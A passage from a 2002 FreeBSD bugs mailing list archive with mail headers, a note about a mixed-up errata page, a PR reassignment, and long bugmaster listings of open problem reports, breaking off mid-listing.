[24.234.50.52]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9746C43E6E for ; Mon, 19 Aug 2002 10:54:47 -0700 (PDT) (envelope-from robin@constellation.wizardsworks.org) Received: from constellation.wizardsworks.org (IDENT:1024@localhost [127.0.0.1]) by constellation.wizardsworks.org (8.12.4/8.12.4) with ESMTP id g7JHtsNn003568 for ; Mon, 19 Aug 2002 10:55:54 -0700 Received: from localhost (robin@localhost) by constellation.wizardsworks.org (8.12.4/8.12.4/Submit) with ESMTP id g7JHtswV003565 for ; Mon, 19 Aug 2002 10:55:54 -0700 Date: Mon, 19 Aug 2002 10:55:54 -0700 (PDT) From: Robin Carey To: freebsd-bugs@freebsd.org Subject: http://www.freebsd.org/releases/4.6.2R/errata.html Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org It looks like somebody has swapped 4.6R errata for 4.6.2 ... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 10:59:35 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CD7C137B400; Mon, 19 Aug 2002 10:59:33 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7EF3B43E4A; Mon, 19 Aug 2002 10:59:33 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JHxXJU007775; Mon, 19 Aug 2002 10:59:33 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JHxXce007771; Mon, 19 Aug 2002 10:59:33 -0700 (PDT) Date: Mon, 19 Aug 2002 10:59:33 -0700 (PDT) From: Johan Karlsson Message-Id: <200208191759.g7JHxXce007771@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-fs@FreeBSD.org Subject: Re: kern/21807: [patches] Make System attribute correspond to SF_IMMUTABLE Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: [patches] Make System attribute correspond to SF_IMMUTABLE Responsible-Changed-From-To: freebsd-bugs->freebsd-fs Responsible-Changed-By: johan Responsible-Changed-When: Mon Aug 19 10:55:04 PDT 2002 Responsible-Changed-Why: Lets see what -fs think about this proposal. http://www.freebsd.org/cgi/query-pr.cgi?pr=21807 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 11: 0:11 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 48D0B37B40B for ; Mon, 19 Aug 2002 11:00:07 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3A71043E6E for ; Mon, 19 Aug 2002 11:00:06 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Received: from freefall.freebsd.org (peter@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JI06JU007927 for ; Mon, 19 Aug 2002 11:00:06 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Received: (from peter@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JI051f007923 for freebsd-bugs@freebsd.org; Mon, 19 Aug 2002 11:00:05 -0700 (PDT) Date: Mon, 19 Aug 2002 11:00:05 -0700 (PDT) Message-Id: <200208191800.g7JI051f007923@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: FreeBSD bugs list Subject: open PR's (mis)filed to gnats-admin and in limbo Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Current FreeBSD problem reports Critical problems Serious problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [2002/07/18] pending/40733gnats-adminRe: [Fix] security/gpgme pkg-plist info f o [2002/07/19] ports/40774 gnats-admin o [2002/07/23] pending/40939gnats-adminkern/040893: www.vivirasturias.com/dmesg o [2002/07/26] pending/41009gnats-adminRe: fix port: x11/gxset o [2002/07/27] pending/41073gnats-adminRe: added .warning in make(1) + two fixes o [2002/07/28] pending/41080gnats-adminPR 40081 o [2002/07/29] pending/41127gnats-adminRE: Update port: lang/ghc - avoid problem o [2002/07/31] pending/41217gnats-adminRe: new sed -c option to allow ; as a sep o [2002/08/05] pending/41346gnats-adminRe: fix lukemftpd man page: /etc/nologin o [2002/08/06] pending/41373gnats-admin o [2002/08/07] pending/41419gnats-adminREPLY ME ASAP. o [2002/08/09] pending/41472gnats-adminRe: latest portupgrade prevents make arg o [2002/08/09] pending/41475gnats-adminRe: latest portupgrade prevents make arg o [2002/08/09] pending/41512gnats-admin o [2002/08/10] pending/41519gnats-adminfix: subject=Re:%20conf/41054:%20Sendmail o [2002/08/11] pending/41544gnats-adminRe: Updated Port net/mutella 0.3.3 -> 0.4 o [2002/08/11] pending/41569gnats-adminsilo overflow o [2002/08/12] pending/41584gnats-adminHey, whats up? o [2002/08/12] pending/41589gnats-admin o [2002/08/13] pending/41630gnats-admin o [2002/08/14] pending/41659gnats-adminRe: Port Update: devel/cvsdelta o [2002/08/14] pending/41660gnats-admin o [2002/08/14] pending/41669gnats-adminRe: Port Update: devel/cvsdelta o [2002/08/15] pending/41697gnats-adminRe: Update port: devel/hmake -> 3.06 o [2002/08/17] pending/41748gnats-adminRe: mail/razor-agents: (perl58) does not o [2002/08/17] pending/41750gnats-adminRe: mail/razor-agents: (perl58) does not o [2002/08/17] pending/41751gnats-admin[friar_josh@webwarrior.net: docs/40841 Wr 27 problems total. Non-critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [2002/07/31] pending/41220gnats-admin[PATCH] Minor sk driver enhancements o [2002/08/02] pending/41270gnats-adminconfusing directions for kernelconfig cha o [2002/08/13] ports/41640 gnats-adminupdate editors/flim to 1.14.4 3 problems total. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 11: 3:38 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2E2EE37B407 for ; Mon, 19 Aug 2002 11:00:35 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7D7B443E4A for ; Mon, 19 Aug 2002 11:00:16 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Received: from freefall.freebsd.org (peter@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JI0GJU007950 for ; Mon, 19 Aug 2002 11:00:16 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Received: (from peter@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JI06Qk007932 for freebsd-bugs@freebsd.org; Mon, 19 Aug 2002 11:00:06 -0700 (PDT) Date: Mon, 19 Aug 2002 11:00:06 -0700 (PDT) Message-Id: <200208191800.g7JI06Qk007932@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: FreeBSD bugs list Subject: Current problem reports Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Current FreeBSD problem reports The following is a listing of current problems submitted by FreeBSD users. These represent problem reports covering all versions including experimental development code and obsolete releases. Bugs can be in one of several states: o - open A problem report has been submitted, no sanity checking performed. a - analyzed The problem is understood and a solution is being sought. f - feedback Further work requires additional information from the originator or the community - possibly confirmation of the effectiveness of a proposed solution. p - patched A patch has been committed, but some issues (MFC and / or confirmation from originator) are still open. s - suspended The problem is not being worked on, due to lack of information or resources. This is a prime candidate for somebody who is looking for a project to do. If the problem cannot be solved at all, it will be closed, rather than suspended. c - closed A problem report is closed when any changes have been integrated, documented, and tested -- or when fixing the problem is abandoned. Critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- f [1998/05/13] kern/6630 phk [PATCH] Fix for Cyrix I8254 bug o [1998/07/12] kern/7264 gibbs Buslogic BT 950 scsi card not detected o [1998/11/25] kern/8861 mdodd under heavy (multi interface) traffic ep0 s [1999/06/05] kern/12041 n_hibma Crashes on startup if Zip drive is switch f [1999/06/25] kern/12395 gibbs Buslogic SCSI cards (BT948) time out unde o [1999/07/13] alpha/12623 alpha Certain valid numeric strings cause a SIG o [1999/08/10] i386/13059 imp Install aborts with panic:aha0: Invalid C o [2000/01/17] misc/16157 green "fire" screensave kills network performan o [2000/02/14] kern/16708 wpaul 3Com 3c900-Combo Ehternet card make kerne o [2000/02/18] i386/16802 An user math program have the system on K o [2000/03/15] i386/17391 jhb FreeBSD boot loader does not recognize ke o [2000/03/27] kern/17620 jhay Digi/570i sync driver (if_ar.c) causes sy f [2000/03/28] alpha/17642 alpha FreeBSD/alpha 4.0 RELEASE installation fa o [2000/05/09] misc/18466 dillon install via nfs or ftp media silently tru o [2000/05/17] misc/18641 paul FreeBSD V4.0 crashes when using ifconfig f [2000/05/29] kern/18874 peter 32bit NFS servers export wrong negative v o [2000/06/13] kern/19247 uthread_sigaction.c does not do anything o [2000/06/14] misc/19257 Detection of connected ports on a Cyclom o [2000/07/12] gnu/19882 obrien ld does not detect all undefined symbols! o [2000/07/30] i386/20308 yokota vidcontrol VESA_800x600 causes a kernel p f [2000/07/31] kern/20310 groudier Symbios 53c875j drivers don't work o [2000/08/05] kern/20429 yokota setting flags 0x1 in atkbd0 locks keyboar o [2000/08/08] i386/20495 yokota 4.1-STABLE and 4.1-RELEASE: keyboard does o [2000/08/28] kern/20895 groudier sym driver doesn't work for SYM53C895A o [2000/09/04] misc/21025 msmith BTX loader 1.00 gets 1Gb of memory from B f [2000/09/04] i386/21042 mdodd Keyboard driver problems with PS/2 Model o [2000/09/12] kern/21220 msmith mlx0: I/O error - attempt to write beyond o [2000/09/14] kern/21272 wpaul USB interrupts seem to be turned off o [2000/09/14] kern/21278 gibbs ahc driver wedges on stressed SMP system o [2000/11/01] kern/22494 wpaul Fatal trap 12: page fault while in kernel f [2000/11/02] kern/22557 fatal kernel trap 0x2(memory management) f [2000/11/03] bin/22595 brian telnetd tricked into using arbitrary peer o [2000/11/18] kern/22953 keu driver throws 'usb error on rx: IOERR o [2000/11/20] gnu/22972 obrien Internal Compiler Error o [2000/11/25] misc/23103 standards lacks many ISO C99 features (NAN f [2000/11/27] i386/23145 brian pppoe-test-program panics the server o [2000/11/29] kern/23173 read hangs in linux emulation f [2000/12/09] kern/23411 SMP Kernel Freezes Machines on Dual Proce a [2000/12/14] kern/23547 msmith only one logical device on Mylex AcceleRA f [2000/12/14] i386/23548 4.x causes Thinkpad 560X disk to spin up/ o [2001/01/17] kern/24418 read/write in thread library (-lc_r) does s [2001/01/30] kern/24740 cy filesystem corruption CFP1080 CAM SCSI ca f [2001/02/20] kern/25235 OS Hungs up when using with a Battery of o [2001/03/09] kern/25632 n_hibma USB modem (umodem) may destroy the cfreel o [2001/03/20] kern/25950 obrien Bad drives on asr look zero-length and pa o [2001/03/24] kern/26048 obrien 4.3-RC: SMP and asr driver don't work to o [2001/04/13] kern/26549 IPsec policies for more than one pair of f [2001/04/25] kern/26840 dillon process doing mmap() over nfs hangs in vm o [2001/05/02] ports/27036 sobomax All Ports using Mesa3 are required with - f [2001/05/03] kern/27059 groudier (symbios) SCSI subsystem hangs under heav a [2001/05/10] kern/27250 bp unionfs filesystem panics in large number f [2001/05/11] kern/27275 kernel bug ? o [2001/06/07] bin/27939 pirzyk rlogin uses wrong IP address for remote h f [2001/06/08] kern/27985 Recent -STABLE crashes when accessing dc f [2001/06/09] kern/27987 sos New ATA Driver failure with VIA Southbrid o [2001/06/25] kern/28402 kernel panic caused by softupdates (may b o [2001/06/27] kern/28465 Enabling softupdates on a clean but activ o [2001/06/27] kern/28466 When soft updates is enabled, cpl is not o [2001/06/30] i386/28550 Boot: Fatal Trap 12: page fault while in f [2001/07/02] kern/28630 Look like hung up a kernel after few minu f [2001/07/04] kern/28703 dillon Kernel reboot during tape backup of nfs m o [2001/07/05] kern/28751 n_hibma USB Mouse doesn't seem to work! o [2001/07/14] kern/28966 pirzyk math libraries in linux emulation do not o [2001/07/15] ports/28995 max deMime produces blank line in header part o [2001/07/24] misc/29200 dcs Syntax errors in /boot/device.hints cause o [2001/08/14] conf/29699 Setting NO_MAILWRAPPER results in a syst f [2001/08/15] kern/29742 PCCARD Modems don't work on cardbus bridg o [2001/08/15] kern/29743 TI-1450 interrupt storm o [2001/08/18] kern/29844 setpgrp does not behave as manual says o [2001/08/18] kern/29847 n_hibma USB usbd_probe_and_attach() is broken and o [2001/09/03] kern/30300 -current hang caught and crash-dump'd. o [2001/09/04] ports/30331 portmgr Conflict between bsd.port.mk MAKEFILE var o [2001/09/09] i386/30458 Workstation sometimes hangs when connecte o [2001/09/19] i386/30670 4.3 and 4.4 mfsroot floppies reboot Dell o [2001/09/20] i386/30693 On new install bootup does endless usb0: f [2001/09/21] i386/30705 msmith Installation fails on system with Mylex A o [2001/09/23] kern/30771 Panic when mounting drive a [2001/09/24] i386/30802 gibbs repeat of i386/22760. Adaptec SCSI contro o [2001/09/27] bin/30869 dump does not dump all files of a filesys o [2001/09/29] kern/30921 ACER mechanic ps/2 keyboard don´t work an o [2001/09/30] ports/30935 taoka pips sc880 - needs to have syvr4 support o [2001/10/01] i386/30961 On lsdev -> error & BTX halted =( o [2001/10/04] kern/31042 murray Device name conflict f [2001/10/12] kern/31233 Kernel panics after upgrading to 4.4-STAB o [2001/10/13] ports/31254 obrien I cannot compile Java src files using gcj o [2001/10/14] misc/31266 cjc System can be crashed with "ls -al /flopp o [2001/10/15] bin/31304 joe fix crunchgen to work with more contrib-k o [2001/10/17] conf/31327 Fixes and improvements for rc.diskless* s o [2001/10/24] kern/31468 Spontaneous crashes, possible related to o [2001/10/25] kern/31493 BTX halted with big disk and 4.4R f [2001/10/31] i386/31671 4.4 installer hangs at " Mounting root fr o [2001/11/02] kern/31710 kernel reboots; looks like an unintended o [2001/11/03] i386/31728 Install hangs on: (debug screens last wri o [2001/11/12] ports/31948 steve open-motif: having USE_MOTIF in /etc/make o [2001/11/16] bin/32040 brian 4.4-Release "set mtu" in ppp is broken wi f [2001/11/20] i386/32127 Proliant 1600 kernel panics after SMP is o [2001/11/22] kern/32184 Kernel crashes in ufs code o [2001/11/23] i386/32237 4.4-RELEASE keyboard doesnt work after bo f [2001/11/30] kern/32418 silby kernel table full o [2001/12/04] ports/32506 des Apache mod_auth_pam doesn't works o [2001/12/11] kern/32713 usb mouse detaches from hub and doesnt re o [2001/12/12] alpha/32757 alpha fatal kernel trap using generic kernel fo o [2001/12/14] i386/32830 FreeBSD 4.4 install fails on Thinkpad 750 a [2001/12/14] kern/32831 sos HP Colorado IDE tape drive get wedged eas o [2001/12/16] bin/32895 imp rebooting between Win98SE and 4.4-2001121 a [2001/12/22] i386/33089 murray GENERIC bloat causes 'make world' to brea o [2001/12/27] misc/33261 dwmalone FreeBSD base system does not install tcpd p [2001/12/27] gnu/33262 mp gdb does not handle pending signals corre o [2002/01/07] bin/33670 dwmalone default inetd install allows for unlimite f [2002/01/08] misc/33688 Downloading some files with ftp hangs the o [2002/01/14] ports/33887 kris security/snort port cannot find its rule o [2002/01/16] kern/33951 pthread_cancel is ignored o [2002/01/16] kern/33952 Bogus error message from correct phreads o [2002/01/16] kern/33970 random freeze on IDE Raid 0 (Highpoint HP f [2002/01/17] misc/33997 Reboot Fails on Server o [2002/01/17] i386/34018 response to request from ipv6 client does o [2002/01/18] bin/34028 brian userland ppp o [2002/01/19] kern/34067 n_hibma Reproducable crash on usb ugen o [2002/01/19] kern/34071 pcn-driver is sort-of-broken in 4.5RC2 (a a [2002/01/21] ports/34123 mharo sudo coredumps on ^C in password prompt & o [2002/01/21] i386/34144 installation,mounting root from ufs:/dev/ o [2002/01/25] bin/34274 green 4.5-RC Interoperability issue: sshd o [2002/01/27] ports/34357 portmgr ports needs a resume function. f [2002/01/30] kern/34447 DLink DFE 500 rev E1 + dhclient dc0 crash o [2002/01/30] kern/34470 bde Modem gets sio1 interrupt-level buffer o o [2002/02/06] ports/34669 www "download" links in WWW ports listing are o [2002/02/06] kern/34680 Kernel panics when checking-out a tree (d f [2002/02/07] kern/34711 frequent system stall under moderate scsi f [2002/02/18] kern/35082 scsi IBM Intellistation will not reboot with S o [2002/02/18] i386/35096 Network card dies copying files > 200MB w o [2002/02/20] misc/35151 High NFSD load in FreeBSD 4.5R f [2002/02/26] kern/35354 4.4/4.5 FreeBSD causes hard lock after 20 o [2002/03/01] kern/35466 xe driver can not read CIS tuples o [2002/03/06] i386/35615 sound ES1978 Maestro 2E sound card locks up mac o [2002/03/09] docs/35723 doc le(4) page doesn't warn about likely syst o [2002/03/09] i386/35726 Won't let me use ifconfig on the interfac f [2002/03/14] i386/35902 Right after i configure the ip settings, o [2002/03/15] i386/35950 ACPI missing prevents install from floppi o [2002/03/19] kern/36095 cd9660_vfsops.c: cd9660_vget_internal() k o [2002/03/20] kern/36149 kernel panic with option PPP_DEFLATE for o [2002/03/23] kern/36228 hw.ata.tags=1 does not work o [2002/03/25] kern/36313 ATA disk not bootable anymore after cvsup o [2002/03/26] i386/36342 rl/dc(smc) + ppppoe = major bug ! o [2002/03/27] ports/36404 security-officerAcrobat Reader seems to link against zlib o [2002/03/29] kern/36504 dillon crash/panic vm_object_allocate under file a [2002/03/30] kern/36532 sos ar_buf because it is too short, it makes o [2002/03/30] kern/36549 sym driver fails on Tekram DC-390U in 486 o [2002/04/07] i386/36850 Page Fault using ppp with USB Modem o [2002/04/10] ports/36964 portmgr cvsupit from www.freebsd.org is out of da o [2002/04/10] kern/36970 kernel cannot root device, ar0s1a on boot o [2002/04/12] kern/37015 Kernel panic in tty_subr.c while using pp o [2002/04/14] kern/37056 usb mouse with bios legacy support on han o [2002/04/14] kern/37060 sos kernel panic with hw.ata.tags=1 in ata-di o [2002/04/14] kern/37064 System hangs when removing wire of NIC D- o [2002/04/16] kern/37144 panic: biodone: Zero vnode ref count ... f [2002/04/18] ports/37241 ports character ranges in regular expressions i o [2002/04/19] kern/37257 SMP 4.5 freezes o [2002/04/24] bin/37435 des xdm SIGABRTs after rev 1.3 of etc/pam.d/x o [2002/04/28] ports/37524 glewis java_vm left in memory after exiting mozi o [2002/04/29] kern/37581 Onboard AC97 - channel dead o [2002/04/30] kern/37606 ru genmask, rt_fixchange causes kernel panic o [2002/05/01] kern/37624 joe USB devices: 82801CA/CAM give error with o [2002/05/07] kern/37831 sound Half of buffer gets filled with silence w o [2002/05/10] kern/37929 silby hang of vr interface running at 100 MBit/ o [2002/05/12] i386/38016 i386_get_ldt range checking bug o [2002/05/12] i386/38021 i386_set_ldt can be cheated o [2002/05/13] kern/38029 Kernel panic in lockmgr o [2002/05/13] bin/38058 brian ppp alters IP header length field 40 -> 4 o [2002/05/14] kern/38070 4.6-PRERELEASE panics on resume on Fujits s [2002/05/15] kern/38107 Panic on nullfs a [2002/05/17] ports/38196 trevor domain name transition: sut.ac.jp -> tus. o [2002/05/18] i386/38223 fix vm86 bios call crash bug (updated) o [2002/05/20] alpha/38356 alpha 4.5-RELEASE src/sys tree on the alpha arc o [2002/05/23] conf/38456 pccard.conf is not valid for IO DATA CDP- o [2002/05/23] i386/38459 Intel SB82558B NIC won't initialize prope o [2002/05/23] i386/38484 probe freeze o [2002/05/24] conf/38518 combination of pr-27087 and pr-36911 (2) a [2002/05/26] gnu/38594 Fortan program don't link post gcc-3.1 o [2002/05/28] misc/38672 ifconfig+alias o [2002/05/28] bin/38676 change request for pw command o [2002/05/29] i386/38698 Kernel panics when filesystem with snapsh o [2002/05/30] misc/38748 FreeBSD 4.5 Keyboard problem cannot insta o [2002/05/31] i386/38775 Kernel panic with ATA raid o [2002/06/02] kern/38840 when i pass data over my dialup connectio o [2002/06/03] kern/38848 kernel panic when removing memory stick f o [2002/06/03] misc/38867 Boot "Read error" with offboard Promise u o [2002/06/03] kern/38872 nfs code ignores possibility of MGET(M_WA o [2002/06/04] kern/38909 kernel panic in lockmgr...with invalid pi o [2002/06/06] i386/38944 problems with ed-driver and dlink dfe-650 o [2002/06/07] ports/39008 dwhite py-kqueue wrapper broken with python 2.2 o [2002/06/08] kern/39043 Corrupted files on a FAT32 partition f [2002/06/10] conf/39139 4.4 multi boot loader causes serious dam o [2002/06/11] ports/39152 dima acroread4 dumps core with linux7 o [2002/06/13] i386/39234 SMP 4.6-RC freezes during boot (Fujitsu-S o [2002/06/14] kern/39297 Have random panic somewhere near console o [2002/06/15] misc/39341 ppp + USB modem problem o [2002/06/19] kern/39524 smbfs with nge NIC causes kernel panic o [2002/06/19] i386/39548 sos ata problems with FreeBSD 4.6 o [2002/06/19] kern/39553 FreeBSD-4.6 halt on SMP machine o [2002/06/19] alpha/39560 alpha unaligned access in wihap_input_data ( wi o [2002/06/20] i386/39586 "BTX halted" hile attempting 4.6 install o [2002/06/24] ports/39780 ports mcrypt port fails. Something about host o [2002/06/25] i386/39844 PANIC using mount -> atacontrol detach -> o [2002/06/29] kern/40003 Panic on boot w/4.6 and 4.6-stable from 6 f [2002/07/01] i386/40099 Jul 1 19:39:17 server /kernel: pid 77933 o [2002/07/05] bin/40215 NIS host search not terminate o [2002/07/07] kern/40320 Raid crashed o [2002/07/08] kern/40330 ATA no longer supports Asus A7V266-E Prom o [2002/07/12] kern/40481 Kernel fault on detecting Mylex eXtreme R f [2002/07/13] misc/40542 FreeBSD 4.6 Fatal Traps o [2002/07/14] i386/40564 SMP kernel panic on Intel SE7500CW2 o [2002/07/14] misc/40575 Kern.flp boot floppy error o [2002/07/17] ports/40721 lioux graphics/avifile (v0.7.11.20020711,1) pac o [2002/07/18] kern/40723 Disabling multicast on vlan interface cau f [2002/07/22] kern/40893 www.vivirasturias.com/dmesg f [2002/07/24] i386/40965 Random root access to non-root users from o [2002/07/25] ports/40995 anholt Xfree-4.2.0-libraries have pthread-proble o [2002/07/27] i386/41052 Fresh install on a Compaq ARMADA E500 say o [2002/07/27] ports/41057 ache WebMagick doesn't compile o [2002/07/27] kern/41065 time counters gives negative time, system o [2002/07/29] ports/41147 znerd linux-sun-jdk1.4 was crashed o [2002/07/30] ports/41187 petef /lang/expect make configure failure o [2002/07/31] ports/41199 ports KDE failed after installing kde-studio 2. o [2002/07/31] i386/41212 Corrupted CRC received at random times wh o [2002/08/03] misc/41285 xauth:(argv):1: bad display name ":0" in o [2002/08/05] bin/41350 vnconfig: apparent off-by-one bug o [2002/08/05] i386/41364 pccard: NewMedia "Bus Toaster" SCSI card o [2002/08/06] bin/41384 FreeBSD-STABLE /bin/sh mishandles & && se o [2002/08/07] kern/41402 kernal panics o [2002/08/07] kern/41417 3Com xl0 drivers generate a kernel panic o [2002/08/07] misc/41425 adding new cpu types to bsd.cpu.mk o [2002/08/08] i386/41437 sysinstall 4.6 RELEASE - hang o [2002/08/08] ports/41455 ports amavisd-snapshot-20020531 hangs with send o [2002/08/08] ports/41456 ports couriertls coredumps p [2002/08/09] ports/41467 knu latest portupgrade prevents make arg -DNO o [2002/08/09] i386/41478 Problem with buildworld o [2002/08/09] kern/41494 static routes set with interface address o [2002/08/09] ports/41496 chuckr textproc/sp blows up during compilation o [2002/08/10] ports/41513 tobez lang/perl5.8 - "make test" destroys perl o [2002/08/13] i386/41636 Kernel panic on Intel SE7500CW2 - SMP ker o [2002/08/13] bin/41647 ifconfig doesn't accept lladdr along with o [2002/08/14] i386/41663 support of promise fasttrack 100 tx2 unde o [2002/08/14] ports/41668 skv p5-PodParser does not build due to old Fi o [2002/08/15] ports/41688 openofficeEnhancement for OpenOffice.org: automatic f [2002/08/16] ports/41714 leeym mail/razor-agents: (perl58) does not inst o [2002/08/16] misc/41717 Memory Leak in FreeBSD o [2002/08/16] bin/41721 wes pw_mkdb creates uid 0 accounts for improp o [2002/08/16] i386/41723 Copying files to filesystem causes "integ o [2002/08/18] ports/41764 ports ja-samba, can't make package. o [2002/08/18] kern/41765 UDP socket remains connected after error 250 problems total. Serious problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- s [1996/12/30] kern/2325 quota.user enlarged, no boot on 2.2-BETA o [1997/02/07] kern/2690 asami When Using ccd in a mirror mode, file cre o [1997/02/19] kern/2768 ktrace(1) -i dumps corrupted trace data o [1997/02/20] bin/2785 wpaul callbootd uses an unitialized variable a [1997/04/01] bin/3170 sheldonh vi freaks and dump core if user doesn't e f [1997/05/04] i386/3502 mdodd Merge of if_ix* and if_ie* broke EE/16 su o [1997/05/06] bin/3524 imp rlogin doesn't read $HOSTALIASES for non- o [1997/06/28] misc/3980 peter access via NFS fails during mount-operati o [1997/07/02] kern/4012 peter 2.2-RELEASE/Digital UNIX NFSv3 0 length f f [1997/07/17] kern/4115 peter SunOS NFS file has wrong owner if creator o [1997/07/30] kern/4194 peter kernel pci driver for Digital 21041 Ether o [1997/08/12] kern/4284 paul le0 goes OACTIVE after some time o [1997/08/22] bin/4357 bug in adduser script causes duplicate UI s [1997/10/01] bin/4672 rdist does not do hard links right when t o [1997/10/16] kern/4782 dillon Under certain conditions, several krsh's o [1998/01/27] kern/5587 des session id gets dropped o [1998/02/28] kern/5877 bmilekic sb_cc counts control data as well as data a [1998/04/07] kern/6238 cg Sound-driver patch for MAD16 (OPTi 928,92 a [1998/05/06] bin/6536 peter pppd doesn't restore drainwait for tty s [1998/06/23] bin/7033 Same process notified multiple times o [1998/06/24] i386/7057 mdodd 3Com 3C509 locks up, or has >1000ms rtt u o [1998/07/12] i386/7266 yokota PSM detection failure with Linksys consol s [1998/08/10] kern/7556 sl_compress_init() will fail if called an f [1998/09/11] kern/7902 if_de doesn't properly recognize a "Magic o [1998/09/17] bin/7968 If /usr/libexec/yppwupdate DNE, rpc.yppas o [1998/09/30] gnu/8099 obrien [patch] some bugs in cpio f [1998/10/08] kern/8206 [patch] Unconected UDP socket declined, i o [1998/11/10] bin/8646 peter Implement rlogind -a option f [1998/11/20] kern/8778 gibbs Buslogic BT948 in 2 boxes upgraded from S f [1998/11/25] bin/8865 dwmalone syslogd hangs with serial console o [1998/11/29] conf/8903 dillon /etc/rc can do NFS mounts before the netw o [1998/12/21] kern/9163 adrian [patch] squid does not join a multicast g s [1999/01/07] bin/9379 pppd does not go through all interfaces l o [1999/01/13] kern/9478 assar support for running a script from kldload s [1999/02/06] kern/9927 gibbs the ahc driver doesn't correctly grok swi o [1999/02/15] kern/10107 dillon interlock situation with exec_map and a p f [1999/02/25] bin/10264 davidn passwd(1) tryis NIS even with `-l' switch o [1999/02/28] bin/10312 ken pciconf -l generates output incompatible o [1999/03/02] bin/10353 jon ypserv gets segmentation violation o [1999/03/09] bin/10510 Remote cvs botches commits on occassion o [1999/03/16] bin/10633 fenner [patch] tcpslice timezone problem and upd a [1999/03/24] kern/10778 ru "ipforward_rt" is not cleared when routin o [1999/03/30] kern/10870 eivind Kernel panic when writing to write-protec s [1999/04/08] misc/11024 getpwnam(3) uses incorrect #define to lim s [1999/04/28] conf/11376 NFS mount may be happening too soon in /e o [1999/05/03] kern/11462 imp CS network interface driver (for CS89XX b o [1999/05/04] kern/11490 yokota VESA+VM86+Splash == unstable system o [1999/05/05] kern/11507 imp CS89XX (i386/isa/if_cs.c) fails to proper o [1999/05/05] misc/11525 dwmalone [PATCH] Networking patches to increase # p [1999/05/07] gnu/11562 tar verification doesn't work o [1999/05/13] kern/11697 tegge Disk failure hangs system o [1999/05/18] i386/11773 yokota mouse works at setup time. Under X it go o [1999/05/28] kern/11922 deischen missing reentrant interfaces for getpwnam o [1999/07/07] kern/12551 mks ASIC output is shifted following a short o [1999/07/20] bin/12727 billf Game patches from NetBSD o [1999/08/14] kern/13141 se Multiple LUN support in NCR driver is bro o [1999/09/10] bin/13691 fenner tcpslice cannot extract over 2GB part of o [1999/09/13] kern/13740 jlemon wrong IP statistics s [1999/09/16] conf/13775 multi-user boot may hang in NIS environme s [1999/09/17] i386/13787 lnc driver isn't really the lnc driver o [1999/09/26] misc/13978 peter a write to last column bug appears since o [1999/09/27] kern/13997 rwatson RLIMIT_NPROC works unadequately for jails s [1999/10/04] i386/14135 lpt1 nolonger exists after 3.2-RELEASE o [1999/10/12] kern/14285 dillon NFS client appears to lose data o [1999/10/14] i386/14334 imp AHA-1542A not supported by FreeBSD 3.x (" o [1999/10/26] kern/14549 mdodd 3C509 broken in 3.3 o [1999/10/27] kern/14566 yokota Non-kernel programs have little/no contro a [1999/11/04] kern/14712 iedowse root has access to NFS mounted directorie s [1999/11/12] kern/14848 Frame Relay support, corrected a [1999/11/12] misc/14856 billf ftp stalls on 